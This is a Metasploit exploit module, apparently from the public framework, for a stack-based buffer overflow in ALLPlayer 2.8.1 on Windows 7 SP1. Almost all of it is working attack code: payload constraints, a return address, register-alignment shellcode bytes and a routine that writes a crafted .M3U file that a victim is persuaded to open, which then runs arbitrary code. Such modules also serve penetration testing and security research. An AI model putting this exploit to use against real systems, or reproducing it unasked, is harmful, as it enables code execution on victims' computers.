ALLPlayer M3U Buffer Overflow

##

# This module requires Metasploit: http//metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = NormalRanking

include Msf::Exploit::FILEFORMAT

def initialize(info = {})

super(update_info(info,

'Name' => 'ALLPlayer M3U Buffer Overflow',

'Description' => %q{

This module exploits a stack-based buffer overflow vulnerability in

ALLPlayer 2.8.1, caused by a long string in a playlist entry.

By persuading the victim to open a specially-crafted .M3U file, a

remote attacker could execute arbitrary code on the system or cause

the application to crash. This module has been tested successfully on

Windows 7 SP1.

},

'License' => MSF_LICENSE,

'Author' =>

[

'metacom', # Vulnerability discovery

'Mike Czumak', # Original exploit

'Gabor Seljan' # Metasploit module

],

'References' =>

[

[ 'BID', '62926' ],

[ 'BID', '63896' ],

[ 'EDB', '28855' ],

[ 'EDB', '29549' ],

[ 'EDB', '29798' ],

[ 'EDB', '32041' ],

[ 'OSVDB', '98283' ],

[ 'URL', 'http://www.allplayer.org/' ]

],

'DefaultOptions' =>

{

'ExitFunction' => 'process'

},

'Platform' => 'win',

'Payload' =>

{

'DisableNops' => true,

'BadChars' =>

"\x00\x0a\x0d\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"

,

'Space' => 3060,

'EncoderType' => Msf::Encoder::Type::AlphanumUnicodeMixed,

'EncoderOptions' =>

{

'BufferRegister' => 'EAX'

}

},

'Targets' =>

[

[ ' ALLPlayer 2.8.1 / Windows 7 SP1',

{

'Offset' => 301,

'Ret' => "\x50\x45", # POP POP RET from ALLPlayer.exe

'Nop' => "\x6e" # ADD BYTE PTR DS:[ESI],CH

}

]

],

'Privileged' => false,

'DisclosureDate' => 'Oct 09 2013',

'DefaultTarget' => 0))

register_options(

[

OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u'])

],

self.class)

end

def exploit

nop = target['Nop']

sploit = rand_text_alpha_upper(target['Offset'])

sploit << "\x61\x50" # POPAD

sploit << target.ret

sploit << "\x53" # PUSH EBX

sploit << nop

sploit << "\x58" # POP EAX

sploit << nop

sploit << "\x05\x14\x11" # ADD EAX,0x11001400

sploit << nop

sploit << "\x2d\x13\x11" # SUB EAX,0x11001300

sploit << nop

sploit << "\x50" # PUSH EAX

sploit << nop

sploit << "\xc3" # RET

sploit << nop * 109

sploit << payload.encoded

sploit << rand_text_alpha_upper(10000) # Generate exception

# Create the file

print_status("Creating '#{datastore['FILENAME']}' file ...")

file_create("http://" + sploit)

end